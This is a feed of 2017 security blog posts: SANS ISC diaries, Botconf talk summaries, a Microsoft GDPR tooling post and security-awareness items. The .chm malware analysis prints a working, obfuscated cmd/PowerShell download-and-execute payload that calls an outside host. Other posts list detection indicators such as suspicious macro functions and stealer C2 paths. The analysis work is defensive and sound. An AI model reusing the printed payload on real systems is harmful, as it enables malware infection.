Saturday, December 30, 2017

[SANS ISC] 2017, The Flood of CVEs

I published the following diary on isc.sans.org: “2017, The Flood of CVEs“:

2017 is almost done and it’s my last diary for this year. I made a quick review of my CVE database (I’m using a local cve-search instance). The first interesting figure is the number of CVEs created this year. Do you remember when the format was CVE-YYYY-XXXX? The CVE ID format changed in 2014 to break the limit of 9999 entries per year. This was indeed a requirement when you see the number of entries for the last five years… [Read more]

[The post [SANS ISC] 2017, The Flood of CVEs has been first published on /dev/random]



from Xavier

Friday, December 22, 2017

Who’s That Bot?

If you own a website, you already know that your servers are visited all day long by bots and crawlers with multiple intents, sometimes good but sometimes also bad. An interesting field in web server logs is the “user-agent”. RFC 2616 describes the User-Agent field used in HTTP requests:

The User-Agent request-header field contains information about the user agent originating the request. This is for statistical purposes, the tracing of protocol violations, and automated recognition of user agents for the sake of tailoring responses to avoid particular user agent limitations. User agents SHOULD include this field with requests. The field can contain multiple product tokens (section 3.8) and comments identifying the agent and any subproducts which form a significant part of the user agent. By convention, the product tokens are listed in order of their significance for identifying the application.

It’s always interesting to keep an eye on the User-Agents found in your logs, even if they are often spoofed. The field can indeed contain almost anything. Note that many websites trust the User-Agent to display content in different ways depending on the browser or the operating system. During an old pentest engagement, I even saw an authentication bypass triggered by a specific User-Agent… which is bad! That’s why a tool exists to stress-test a website with multiple variations of User-Agent strings: ua-tester.

Most tools and browsers allow selecting the User-Agent via a configuration file or a plugin (for browsers). The choice of a User-Agent string may vary depending on your goal. During a penetration test, you’ll try to stay below the radar by using a very common User-Agent (a well-known browser on a modern OS):

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
  Chrome/63.0.3239.84 Safari/537.36

Sometimes, you will change the User-Agent to detect behaviour changes (e.g. to access the mobile version of a website):

Mozilla/5.0 (Linux; Android 4.4.4; SAMSUNG SM-G318H Build/KTU84P) AppleWebKit/537.36 \
  (KHTML, like Gecko) SamsungBrowser/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36

Finally, sometimes it’s better to show clean hands!

For my research and while hunting, I’m fetching a *lot* of data from websites. Sometimes, I’m accessing the same pages again and again. This behaviour can be seen as intrusive by the website owner. In such cases, it’s always better to be polite and present yourself. In my scripts, I always use the following User-Agent:

XmeBot/1.0 (https://blog.rootshell.be/bot/)

The URL points to a hidden page on my blog that provides more information about me and my intents (basically, why I’m fetching data). Keeping an eye on the page’s access statistics also helps me learn who’s watching their website logs 😉
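As an illustration, here is a minimal Python sketch of announcing a bot politely via a custom User-Agent header (the bot name and info URL below are placeholders, not my real ones):

```python
import urllib.request

# Identify the bot politely via the User-Agent header
# (bot name and info URL are illustrative placeholders).
req = urllib.request.Request(
    "https://example.com/data.json",
    headers={"User-Agent": "MyBot/1.0 (https://example.com/bot/)"},
)
print(req.get_header("User-agent"))  # MyBot/1.0 (https://example.com/bot/)
```

The same idea applies to any HTTP client; most of them expose the header via a configuration option or a request parameter.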

[The post Who’s That Bot? has been first published on /dev/random]



from Xavier

Wednesday, December 20, 2017

Installing Python Modules on Air-Gapped Hosts

Who said that all computers are connected today? There are many classified environments where computers can simply never connect to the wild Internet. But sometimes, you need to install software from online resources. The classic case is Python modules. Let’s take a practical example with PyMISP, which allows interacting with a MISP instance. Forget about running a ‘pip install pymisp’ on an air-gapped computer!

The next challenge is to resolve all the dependencies. On an air-gapped host, to make PyMISP work properly, I had to follow this dependency tree (this might change depending on your Python environment):

pymisp -> dateutil -> six
       -> requests -> idna
                   -> urllib3
                   -> chardet
                   -> certifi

If you need to download these packages manually from source, transfer them, and build them, you will probably face another issue: the air-gapped environment does not have all the tools required to build the packages (which sounds logical). There is a solution: “Wheel”. It’s a built-package archive format that can greatly speed up installation compared to building and installing from source archives. A wheel archive (.whl) can be installed with the pip tool:

C:\Temp> pip install .\requests-2.18.4-py2.py3-none-any.whl

I found a wonderful source of ready-to-use Wheel archives prepared by Christoph Gohlke from the University of California, Irvine. He maintains a huge library of common Python packages (for both Python 2 & 3).

If you’re working in a restricted environment, you probably don’t have admin rights. Add the ‘--user’ argument to the pip command to install the Python module in your $USER environment.

Keep in mind:

  • Some packages might contain executable code. Don’t break your local policy!
  • Always download material from trusted sources
  • Validate hashes
  • Build your own Wheel archives if in doubt and create your own repository
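As a sketch of the “validate hashes” step (file names are illustrative), computing a wheel’s SHA-256 before carrying it across the air gap:

```python
import hashlib

def sha256_of(path: str) -> str:
    # Stream in chunks so large archives don't load fully into memory.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

# Compare against the hash published by the trusted source (e.g. PyPI):
# sha256_of("requests-2.18.4-py2.py3-none-any.whl") == expected_hash
```

Run this on both sides of the air gap and compare the digests before installing anything.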

[The post Installing Python Modules on Air-Gapped Hosts has been first published on /dev/random]



from Xavier

Tuesday, December 19, 2017

Malware Delivered via a Compiled HTML Help File

The more a file format is used in malware infection chains, the more files of that type will be flagged as suspicious, analyzed, or blocked by security controls. That’s why attackers are constantly looking for new ways to infect computers and turn to more exotic file formats. Like fashion, which is in a state of perpetual renewal, some file formats regularly come back on the malware scene. Today, I found a malicious .chm file. A .chm file is a compiled HTML Help file that may include text, images, and hyperlinks. It can be viewed in a web browser, in programs as an online help solution, or by Windows via a specific tool: hh.exe.

Like most Microsoft file formats, it may also link to external resources that can be launched from the HTML file. By external resources, I mean here malicious scripts or executables. The file reached my spam trap and was delivered in a ZIP archive: NF_e_DANFE41160909448706.zip (SHA256: f66964e733651d78593d593e2bd83913b6499fa80532abce64e07a91293eb12d). The .chm file was called NF-e_DANFE41160909448706kPEvjg.chm (SHA256: 867d0bb716acdb40ae403fc734351c5f195cb98b6f032ec77ef72160e6435d1f). When the file is opened, the default tool, hh.exe, is used and displays a blank page. A command prompt is launched with a PowerShell script:

Malware Behaviour

It is easy to understand what is happening, but is there a way to better analyze the content of the compiled HTML Help file? hh.exe has a ‘-decompile’ flag which, as the name says, decompiles the .chm file into a folder:

C:\Users\xavier\Desktop> hh.exe -decompile malicious NF-e_DANFE41160909448706kPEvjg.chm

In the malicious directory, we now find the original file. Here is its content:

<OBJECT id="XJUY7K" type="application/x-oleobject" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" codebase="hhctrl.ocx#Version=5,02,3790,1194" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe, /C &quot;cd %SystemRoot%\System32&&cm^d^.exe /V ^/^C^ se^t^ r^i^=ers^&^&set ^ji=^^h^^e^^l^^l^&^&^s^e^t^ ju^=^^p^^o^^w^&^&^set ^rp^=^^W^^in^^d^^ows!^ju!^!^ri^!^!ji!\^^v^^1^^.^^0^^\^!j^u^!^!^ri!^!^ji!^&^&^echo^ ^^IE^^x^^(^^^&quot;`I^^E^^`X(n^^`eW-^^O^^BJ^^E`C^^t^^ n^^ET^^.^^wE^^b^^`c^^`l^^i`e^^N^^t^^`)^^.^^d^^Ow^^Nlo^^a^^Ds^^tr^^i^^n^^g('ht^^tp^^s^^://jaz^^y^^.oth^^iak.c^^o^^m^^/?^^d^^mF^^us^^AKL^^Yq^^Q^^C8^^5^^t^^B^^e^^8^^pKTM^^CS^^g^^p^^ReW^^TJa+r^^ClY^^m^^w^^f^^Mn^^f^^s^^CI^^L^^X^^a^^3Fj^^3^^g^^g^^V^^R^^j^^s^^iR^^OS^^s^^OS^^O^^qj^^r^^jb^^OWu^^rLN^^T^^v^^I^^G^^AaAoVw3kD8^^2/^^W^^rI^^PAb3^^QU^^9BsS^^5^^2V^^p^^6')^^^&quot;^^); ^|^ !^rp^!^ -nop^^ ^^-win 1 -&quot;">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
XJUY7K.Click();
</SCRIPT>
</HEAD>
<body>
</BODY>
</HTML>

The second stage is downloaded from hXXps://jazy.othiak[.]com/?dmFusAKLYqQC85tBe8pKTMCSgpReWTJa+rClYmwfMnfsCILXa3Fj3ggVRjsiROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3QU9BsS52Vp6
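The Item1 value above is layered: HTML entities plus cmd.exe caret escapes. Since cmd.exe simply ignores ‘^’, a tiny sketch like this peels most of the obfuscation (the delayed-expansion !variables! still need manual substitution):

```python
import html

def peel(param_value: str) -> str:
    decoded = html.unescape(param_value)  # &quot; -> "
    return decoded.replace("^", "")       # cmd.exe ignores caret escapes

print(peel("se^t^ r^i^=ers"))  # set ri=ers
```

Applied to the whole Item1 string, this reveals the PowerShell download cradle pointing at the URL above.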

Nothing fancy, not really new but still effective…


[The post Malware Delivered via a Compiled HTML Help File has been first published on /dev/random]



from Xavier

How Microsoft tools and partners support GDPR compliance

This post is authored by Daniel Grabski, Executive Security Advisor, Microsoft Enterprise Cybersecurity Group.

As an Executive Security Advisor for enterprises in Europe and the Middle East, I regularly engage with Chief Information Security Officers (CISOs), Chief Information Officers (CIOs) and Data Protection Officers (DPOs) to discuss their thoughts and concerns regarding the General Data Protection Regulation, or GDPR. In my last post about GDPR, I focused on how GDPR is driving the agenda of CISOs. This post will present resources to address these concerns.

Some common questions are: “How can Microsoft help our customers be compliant with GDPR?” and “Does Microsoft have tools and services to support the GDPR journey?” Another is: “How can I use current investments in Microsoft technology to address GDPR requirements?”

To help answer these, I will address the following:

  • GDPR benchmark assessment tool
  • Microsoft partners & GDPR
  • Microsoft Compliance Manager
  • New features in Azure Information Protection

Tools for CISOs

There are tools available that can ease kick-off activities for CISOs, CIOs, and DPOs. These tools can help them better understand their GDPR compliance, including which areas are most important to be improved.

  • To begin, Microsoft offers a free GDPR benchmark assessment tool which is available online to any business or organization. The assessment questions are designed to help our customers identify technologies and steps that can be implemented to simplify GDPR compliance efforts. It is also a tool for increasing visibility and understanding of features available in Microsoft technologies that may already be present in existing infrastructures. The tool can reveal what already exists and what is not yet addressed to support each GDPR journey. As an outcome of the assessment, a full report is sent, an example of which is shown here.

Image 1: GDPR benchmarking tool

As an example, see below the mapping to the first question in the Assessment. It is based on how Microsoft technology can support requirements regarding the collection, storage, and usage of personal data; to meet them, it is necessary to first identify the personal data currently held.

  • Azure Data Catalog provides a service in which many common data sources can be registered, tagged, and searched for personal data. Azure Search allows our customers to locate data across user-defined indexes. It is also possible to search for user accounts in Azure Active Directory. For example, CISOs can use the Azure Data Catalog portal to remove preview data from registered data assets and delete data assets from the catalog:

Image 2: Azure Data Catalog

  • Dynamics 365 provides multiple methods to search for personal data within records such as Advanced Find, Quick Find, Relevance Search, and Filters. These functions each enable the identification of personal data.
  • Office 365 includes powerful tools to identify personal data across Exchange Online, SharePoint Online, OneDrive for Business, and Skype for Business environments. Content Search allows queries for personal data using relevant keywords, file properties, or built-in templates. Advanced eDiscovery identifies relevant data faster, and with better precision, than traditional keyword searches by finding near-duplicate files, reconstructing email threads, and identifying key themes and data relationships. Image 3 illustrates the common workflow for managing and using eDiscovery cases in the Security & Compliance Center and Advanced eDiscovery.

Image 3: Security & Compliance Center and Advanced eDiscovery

  • Windows 10 and Windows Server 2016 have tools to locate personal data, including PowerShell, which can find data housed in local and connected storage, as well as search for files and items by file name, properties, and full-text contents for some common file and data types.
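As a simple illustration of that idea (this is only a sketch, not a Microsoft tool): walking a directory tree and flagging text files that contain an email-like pattern.

```python
import re
from pathlib import Path

# Crude first pass at "where is personal data stored?":
# flag .txt files containing an email-like pattern.
EMAIL = re.compile(rb"[\w.+-]+@[\w-]+\.[\w.-]+")

def find_personal_data(root: str) -> list:
    hits = []
    for path in Path(root).rglob("*.txt"):
        if EMAIL.search(path.read_bytes()):
            hits.append(str(path))
    return sorted(hits)
```

A production-grade discovery tool would of course cover many more file types and data patterns.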

A sample outcome, based on one of the questions regarding GDPR requirements, is shown in Image 4.

Image 4: example of the GDPR requirements mapped with features in the Microsoft platform

Resources for CISOs

Microsoft’s approach to GDPR relies heavily on working together with partners. Therefore, we built a broader version of the GDPR benchmarking tool available to customers through the extensive Microsoft Partner Network. The tool provides an in-depth analysis of an organization’s readiness and offers actionable guidance on how to prepare for compliance, including how Microsoft products and features can help simplify the journey.

The Microsoft GDPR Detailed Assessment is intended to be used by Microsoft partners who are assisting customers to assess where they are on their journey to GDPR readiness. The GDPR Detailed Assessment is accompanied by supporting materials to assist our partners in facilitating customer assessments.

In a nutshell, the GDPR Detailed Assessment is a three-step process where Microsoft partners engage with customers to assess their overall GDPR maturity. Image 5 below presents a high-level overview of the steps.

Image 5

The partner engagement is expected to last 3-4 weeks, while the total effort is estimated at 10 to 20 hours, depending on the complexity of the organization and the number of participants, as you can see below.

Image 6: Duration of the engagement

The Microsoft GDPR Detailed Assessment is intended for use by Microsoft partners to assess their customers’ overall GDPR maturity. It is not offered as a GDPR compliance attestation. Customers are responsible for ensuring their own GDPR compliance and are advised to consult their legal and compliance teams for guidance. This tool is intended to highlight resources that can be used by partners to support a customer’s journey towards GDPR compliance.

We are all aware that achieving organizational compliance may be challenging. It is hard to stay up-to-date with all the regulations that matter to organizations and to define and implement controls with limited in-house capability.

To address these challenges, Microsoft announced a new compliance solution to help organizations meet data protection and regulatory standards more easily when using Microsoft cloud services: Compliance Manager. The preview program, available today, addresses compliance management challenges and:

  • Enables real-time risk assessment on Microsoft cloud services
  • Provides actionable insights to improve data protection capabilities
  • Simplifies compliance processes through built-in control management and audit-ready reporting tools

Image 7 shows a dashboard summary illustrating a compliance posture against the data protection regulatory requirements that matter when using Microsoft cloud services. The dashboard summarizes Microsoft’s and your performance on control implementation on various data protection standards and regulations, including GDPR, ISO 27001, and ISO 27018.

Image 7: Compliance Manager dashboard

Having a holistic view is just the beginning. Use the rich insights available in Compliance Manager to go deeper and understand what should be done and improved. Each Microsoft-managed control shows the implementation and testing details, test date, and results. The tool provides recommended actions with step-by-step guidance and aids in understanding how to use Microsoft cloud features to efficiently implement the controls managed by your organization. Image 8 shows an example of the insight provided by the tool.

Image 8: Information to help you improve your data protection capabilities

During the recent Microsoft Ignite conference, Microsoft announced the Azure Information Protection scanner. The feature is now available in public preview. It will help manage and protect significant amounts of on-premises data and help prepare our customers and partners for regulations such as GDPR.

We released Azure Information Protection (AIP) to provide the ability to define a data classification taxonomy and apply those business rules to emails and documents. This feature is critical to protecting the data correctly throughout the lifecycle, regardless of where it is stored or shared.

We receive a lot of questions about how Microsoft can help to discover, label, and protect existing files to ensure all sensitive information is appropriately managed. The AIP scanner can:

  • Discover sensitive data that is stored in existing repositories when planning data-migration projects to cloud storage, to ensure toxic data remains in place.
  • Locate data that includes personal data and learn where it is stored to meet regulatory and compliance needs
  • Leverage existing metadata that was applied to files using other solutions

I encourage you to enroll for the preview version of Azure Information Protection scanner and to continue to grow your knowledge about how Microsoft is addressing GDPR and general security with these helpful resources:


About the author:

Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for organizations in Europe, the Middle East, and Africa within the Microsoft Enterprise Cybersecurity Group. In this role he focuses on enterprises, partners, public sector customers, and critical infrastructure stakeholders, delivering strategic security expertise and advising on the cybersecurity solutions and services needed to build and maintain secure and resilient ICT infrastructures.



from Microsoft Secure Blog Staff

[SANS ISC] Example of ‘MouseOver’ Link in a Powerpoint File

I published the following diary on isc.sans.org: “Example of ‘MouseOver’ Link in a Powerpoint File“:

I really like Microsoft Office documents… They offer so many features that can be (ab)used to make them virtual bombs. Yesterday, I found a simple but nicely prepared Powerpoint presentation: Payment_copy.ppsx (SHA256: 7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f). It was still unknown on VT yesterday but has now reached a score of 1/61! It was delivered to one of my catch-all mailboxes and contained just one slide…. [Read more]


[The post [SANS ISC] Example of ‘MouseOver’ Link in a Powerpoint File has been first published on /dev/random]



from Xavier

"Public Wi-Fi Attacks - Starbucks"

One of the dangers of working while on the road is using public Wi-Fi access points, such as the ones you find in your hotel, airport, or local cafe. Public Wi-Fi is incredibly convenient, but does come with its own unique risks. The two biggest threats are bad guys either setting up rogue Wi-Fi access points, or … Continue reading Public Wi-Fi Attacks - Starbucks

from lspitzner

Monday, December 18, 2017

"HR - *Please* Stop Requiring Tech Backgrounds for Security Awareness Officers"

As we get ready to enter 2018, one of the things I’m so excited to see is more and more organizations investing in managing their human risk, including hiring for what many call a Security Awareness Officer, a Security Communications Officer, or a position related to Security Training or Culture. To be honest, I’m far less concerned about … Continue reading HR - *Please* Stop Requiring Tech Backgrounds for Security Awareness Officers

from lspitzner

Saturday, December 16, 2017

[SANS ISC] Microsoft Office VBA Macro Obfuscation via Metadata

I published the following diary on isc.sans.org: “Microsoft Office VBA Macro Obfuscation via Metadata“:

Often, malicious macros make use of the same functions to infect the victim’s computer. If a macro contains these strings, it can be flagged as malicious or, at least, considered suspicious. Some examples of suspicious functions are:

  • Microsoft.XMLHTTP (used to fetch web data)
  • WScript.Shell (used to execute other scripts or commands)

… [Read more]


[The post [SANS ISC] Microsoft Office VBA Macro Obfuscation via Metadata has been first published on /dev/random]



from Xavier

Thursday, December 14, 2017

"2017 EU Security Awareness Summit - After Action Report"

The SANS EU Security Awareness Summit is an annual event that brings together security awareness professionals and industry experts from around the world to share and learn from each other how to manage human risk. This year was the largest event ever in Europe, bringing together over 130 awareness professionals for a jam-packed … Continue reading 2017 EU Security Awareness Summit - After Action Report

from lspitzner

Wednesday, December 13, 2017

How public-private partnerships can combat cyber adversaries

For several years now, policymakers and practitioners from governments, CERTs, and the security industry have been speaking about the importance of public-private partnerships as an essential part of combating cyber threats. It is impossible to attend a security conference without a keynote presenter talking about it. In fact, these conferences increasingly include sessions or entire tracks dedicated to the topic. During the three conferences I’ve attended since June, two US Department of Defense symposia and NATO’s annual Information Symposium in Belgium, the message has been consistent: public-private information-sharing is crucial to combat cyber adversaries and protect users and systems.

Unfortunately, we stink at it. Information-sharing is the Charlie Brown football of cyber: we keep running toward it only to fall flat on our backs as attackers continually pursue us. Just wait ’til next year. It’s become easier to talk about the need to improve information-sharing than to actually make it work, and it’s now the technology industry’s convenient crutch. Why? Because no one owns it, so no one is accountable. I suspect we each have our own definition of what information-sharing means, and of what success looks like. Without a sharp vision, can we really expect it to happen?

So, what can be done?

First, some good news: the security industry wants to do this, to partner with governments and CERTs. So, when we talk about it at conferences, or when a humble security advisor in Redmond blogs about it, it’s because we are committed to finding a solution. Microsoft recently hosted BlueHat, where hundreds of malware hunters, threat analysts, reverse engineers, and product developers from the industry put aside competitive priorities to exchange ideas and build partnerships. In my ten years with Microsoft, I’ve directly participated in and led information-sharing initiatives that we established for the very purpose of advancing information assurance and protecting cyberspace. In fact, in 2013, Microsoft created a single legal and programmatic framework to address this issue: the Government Security Program.

For the partnership to work, it is important to understand and anticipate the requirements and needs of government agencies. For example, we need to consider cyber threat information, YARA rules, attacker campaign details, IP addresses, hosts, network traffic, and the like.

What can governments and CERTs do to better partner with industry?

  • Be flexible, especially on the terms. Communicate. Prioritize. In my experience, the mean-time-to-signature for a government to negotiate an info-sharing agreement with Microsoft is between six months and THREE YEARS.
  • Prioritize information-sharing. If this is already a priority, close the gap. I fear governments’ attorneys are not sufficiently aware of how important the agreements are to their constituents. The information-sharing agreements may well be non-traditional agreements, but if information-sharing is truly a priority, let’s standardize and expedite the agreements. Start by reading the 6 Nov Department of Homeland Security OIG report, “DHS Can Improve Cyber Threat Information-Sharing”.
  • Develop and share with industry partners a plan showing how government agencies will consume and use our data. Let industry help governments and CERTs improve our collective ROI. Before asking for data, let’s ensure it will be impactful.
  • Develop KPIs, quantitative or qualitative, to measure whether an information-sharing initiative is making a difference. In industry, we could do a better job at this, as we generally assume that we’re providing information for the right reason. However, I frequently question whether our efforts make a real difference. Whether we look for mean-time-to-detection improvements or other metrics, this is an area for improvement.
  • Commit to feedback. Public-private information-sharing implies two-way communication. Understand that more companies are making feedback a criterion to justify continuing investment in these not-for-profit engagements. Feedback helps us justify up the chain the efficacy of efforts that we know are important. It also improves two-way trust and contributes to a virtuous cycle of more and closer information-sharing. At Microsoft, we require structured feedback as the price of entry for a few of our programs.
  • Balance interests in understanding today’s and tomorrow’s threats with an equal commitment to lock down what is currently owned. (My favorite) Information-sharing usually includes going after threat actors and understanding what’s coming next. That’s important, but in an “assume compromise” environment, we need to continue to hammer on the basics:
    • Patch. If an integrator or on-site provider indicates patching and upgrading will break an application, and if that is used as an excuse not to patch, that is a problem. Authoritative third parties such as US-CERT, SANS, and others recommend a 48- to 72-hour patch cycle. Review www.microsoft.com/secure to learn more.
      • Review www.microsoft.com/sdl to learn more about tackling this issue even earlier in the IT development cycle, and how to have important conversations with contractors, subcontractors, and ISVs in the software and services supply chain.
    • Reduce administrative privilege. This is especially important for contractor or vendor accounts. Up to 90 percent of breaches come from credential compromise. This is largely caused by a lack of, or obsolete, administrative, physical, and technical controls over sensitive assets. Basic information-sharing demands that we focus on this. Here is guidance regarding securing access.

Ultimately, we in the industry can better serve governments and CERTs by incentivizing migrations to newer platforms that offer more built-in security and are more securely developed. As we think about improving information-sharing, let’s be clear that this includes not only sharing technical details about threats and actors but also guidance on making governments fundamentally more secure on newer and more secure technologies.




from Jenny Erie

[SANS ISC] Tracking Newly Registered Domains

I published the following diary on isc.sans.org: “Tracking Newly Registered Domains“:

Here is the next step in my series of diaries related to domain names. After tracking suspicious domains with a dashboard and proactively searching for malicious domains, let’s focus on newly registered domains. There are a huge number of domain registrations performed every day (on average a few thousand per day, all TLDs combined). Why focus on new domains? With the multiple DGAs (“Domain Generation Algorithms”) used by malware families, it is useful to track newly created domains and correlate them with your local resolvers’ logs. You could detect some emerging threats or suspicious activities… [Read more]

[The post [SANS ISC] Tracking Newly Registered Domains has been first published on /dev/random]



from Xavier

Friday, December 8, 2017

Botconf 2017 Wrap-Up Day #3

And this is already the end of Botconf. Time for my last wrap-up. The day started a little bit later to allow some people to recover from the social event. It started at 09:40 with a talk presented by Anthony Kasza, from Palo Alto Networks: “Formatting for Justice: Crime Doesn’t Pay, Neither Does Rich Text“. Everybody knows the RTF format… even more since the famous CVE-2017-0199. But what’s inside an RTF document? As the name says, it is used to format text. It was created by Microsoft in 1987. It has similarities with HTML:

RTF vs HTML

Entities are represented with ‘{‘ and ‘}’. Example:

{\i This is some italic text}

There are control words like “\rtf”, “\info”, “\author”, “\company”, “\i”, “\AK”, etc. It is easy to obfuscate such a document with extra whitespace, headers, or nested elements:

{\rtf [\info]] == {\rtf }}

This means that writing signatures is complex. Also, just rename the document with a .doc extension and it will be opened by Word. How are RTF documents generated? There are the official tools like Microsoft Word or WordPad but there are, of course, plenty of malicious ones:

  • 2017-0199 builder
  • wingd/stone/ooo
  • Sofacy, Monsoon, MWI
  • Ancalog, AK builder

What about analysis tools? Here also, it is easy to build a toolbox with nice tools: rtfdump, rtfobj, pyRTF and YARA are some of them. To write good signatures, Anthony suggested focusing on suspicious control words:

  • \info
  • \object
  • DDEAUTO
  • \pict
  • \insrsid or \rsidtbl

DDEAUTO has been a good candidate for a while and was seen as the “most annoying bug of the year” for its inclusion in everything (RTF & other documents, e-mails, calendar entries…). Anthony finished his talk by providing a challenge based on an RTF file.
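A naive triage sketch based on that list of suspicious control words (real samples obfuscate them with extra whitespace and nesting, so rtfdump/rtfobj/YARA remain the robust options):

```python
SUSPICIOUS = (b"\\info", b"\\object", b"DDEAUTO", b"\\pict", b"\\insrsid", b"\\rsidtbl")

def flag_rtf(data: bytes) -> list:
    # Naive substring scan; defeated by the whitespace tricks described above.
    return [word.decode() for word in SUSPICIOUS if word in data]

print(flag_rtf(b"{\\rtf1{\\object data {\\pict ffd8ffe0}}}"))  # ['\\object', '\\pict']
```

Useful at best as a quick first pass over a pile of samples, not as a signature.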

The next talk was presented by Paul Jung: “PWS, Common, Ugly but Effective“. PWS, also known as “info stealers”, are a very common piece of malware. They steal credentials from many sources (browsers, files, registries, wallets, etc.).
PWS

They also offer “bonus” features like screenshot grabbers or keyloggers. How to find them? Buy them, find a cracked one, or use an open-source one. Some of them even have promotional videos on YouTube! A PWS is based on a builder that generates a specific binary based on a config file; it is delivered via protocols like email or HTTP, and data is managed via a control panel. Paul reviewed some well-known PWS like JPro Crack Stealer, Pony (the most famous), Predator Pain and Agent Tesla. The last one promotes itself as “not being malware”. Some of them support more than 130 different applications to steal passwords from. Some do not reinvent the wheel and just use external tools (e.g. the NirSoft suite). While it is difficult to detect them before the infection, it’s quite easy to spot them based on the noise they generate in log files. They use specific queries:

  • “POST /fre.php” for Lokibot
  • “POST /gate.php” for Pony or Zeus

Very nice presentation!

After the first coffee refill break, Paul Rascagnères presented “Nyetya Malware & MeDoc Connection“. The presentation was a recap of the bad story that affected Ukraine a few months ago. It started with a phone call saying “We need help“. They received some info to start the investigation but their telemetry did not return anything juicy (Talos collects a huge amount of data to build its telemetry). Paul explained the case of M.E.Doc, a company providing a Windows application for tax processing. The company’s servers were compromised and the software was modified. Then, Paul reviewed the Nyetya malware. It used WMI, PsExec, EternalBlue, EternalRomance and scanned ranges of IP addresses to infect more computers. It also used a modified version of Mimikatz. Note that Nyetya cleared the infected hosts’ logs. This is a good reminder to always push logs to an external system to prevent losing pieces of evidence.

The next talk was about a system to track the Locky ransomware based on its DGA: “Math + GPU + DNS = Cracking Locky Seeds in Real Time without Analyzing Samples“. Yohai Einav and Alexey Sarychev explained how they solved the problem of detecting, as fast as possible, new variations of domain names used by the Locky ransomware. The challenges were:

  • To get the DGA  (it’s public now)
  • To be able to process a vast search space. The seed space can become enormous (from a 3-digit seed to 4, then 5, 6 digits). There is a scalability problem.
  • Mapping the ambiguity (and avoiding collisions with other DGAs)

The solution they developed is based on GPUs (for maximum speed). If you’re interested in the Locky DGA, you can have a look at their dataset.
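The real Locky DGA is public, so as an illustration only, here is a toy DGA with the same brute-force structure: generate domains for every candidate seed and intersect them with observed traffic. The `toy_dga` function is invented for this sketch (it is not Locky's algorithm); on a GPU, this same embarrassingly parallel seed scan is what makes real-time cracking feasible.

```python
import hashlib

def toy_dga(seed, day, count=3):
    """Illustrative stand-in for a real DGA: derive domains from a seed and a date."""
    domains = []
    for i in range(count):
        h = hashlib.md5(f"{seed}:{day}:{i}".encode()).hexdigest()
        domains.append(h[:12] + ".info")
    return domains

def find_seed(observed, day, max_seed=10000):
    """Brute-force the seed space until generated domains overlap the observed set."""
    observed = set(observed)
    for seed in range(max_seed):
        if observed & set(toy_dga(seed, day)):
            return seed
    return None
```

With the real DGA plugged in, `observed` would come from NXDOMAIN or passive DNS feeds rather than a sample.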

The next talk was, for me, the best of the day because it contained a lot of useful information that many people can immediately reuse in their environment to improve the detection of malicious behaviour or to improve their DFIR process. It was titled “Hunting Attacker Activities – Methods for Discovering, Detecting Lateral Movements” and presented by Keisuke Muda and Shusei Tomonaga. Based on their investigations, they explained how attackers can perform lateral movement inside a network just by using standard Windows tools (which, by default, are not flagged as malicious by antivirus software).

(For reference, a Locky DGA implementation is available at https://github.com/baderj/domain_generation_algorithms/tree/master/locky.)

They presented multiple examples of commands and small scripts used to scan, pivot, cover tracks, etc. Then they explained how to detect this kind of activity. They made a good comparison of the standard Windows audit log versus the well-known Sysmon tool. They presented the pros and cons of each solution and the conclusion is that, for maximum detection, you need both. There were so many examples that it’s not possible to list them all here. I just recommend having a look at the documents they made available online.

It was an amazing presentation!

After lunch, Jaeson Schultz, also from Talos, presented “Malware, Penny Stocks, Pharma Spam – Necurs Delivers“. The talk was a good review of the biggest active spam botnet. Just some numbers collected from multiple campaigns: 2.1M messages, 1M unique sender IP addresses from 216 countries/territories. The top countries are India, Vietnam, Iran and Pakistan. Jaeson explained that the re-use of IP addresses is so low that it’s difficult to maintain blacklists.

IP Addresses Reuse

How do the bad guys send emails? They use harvested accounts (of course) but also auto-generated addresses and common / role-based accounts. That’s why the use of catch-all mailboxes is useful. Usually, big campaigns are launched from Monday to Friday, while regular campaigns constantly run at low speed. Jaeson presented many examples of spam messages and attachments. A good review with entertaining slides.

Then, Łukasz Siewierski presented “Thinking Outside of the (Sand)box“. Łukasz works for Google (Play Store) and analyzes applications. He said that all applications submitted to Google are reviewed from a security point of view. Android has many security features: SELinux, the application sandbox, the permission model, verified boot, (K)ASLR, seccomp, but the presentation focused on the sandbox. First, why is there a sandboxing system? To prevent spyware from accessing other applications’ data, to prevent applications from posing as other ones, to make it easy to attribute actions to specific apps and to allow strict policy enforcement. But how to break the sandbox? First, the malware can ask the user for a number of really excessive permissions. In this case, you just have to wait and cross your fingers that the user will click “Allow”. Another method is to use Xposed. I already heard about this framework at Hack in the Box. It can prevent apps from being displayed in the list of installed applications. It gives any application every permission, but there is one big drawback: the victim MUST install Xposed! The last method is to root the phone, inject code into other processes and profit. Łukasz explained different techniques to perform injection on Android, but it’s not easy, even more so since the release of “Nougat”, which introduced new mitigation techniques.

The last slot was assigned to Robert Simmons, who presented “Advanced Threat Hunting“. It was very interesting because Robert gave nice tips to improve the threat hunting process. It can require a lot of resources that are… limited! We have small teams with limited resources and limited time. He also gave tips to better share information. A good example is YARA rules. Everybody has a set of YARA rules in private directories, on laptops, etc. Why not store them in a central repository like a GitLab server? Many other tips were given that are worth a read if you are performing threat hunting.

The event closed with the classic kind words from the team. You can already mark your agenda for the 6th edition, which will be held in Toulouse!

 

The Botconf Crew

[The post Botconf 2017 Wrap-Up Day #3 has been first published on /dev/random]



from Xavier

Botconf 2017 Wrap-Up Day #2

I’m just back from the social event that was organized at the aquarium Mare Nostrum. A very nice place full of threats as you can see in the picture above. Here is my wrap-up for the second day.

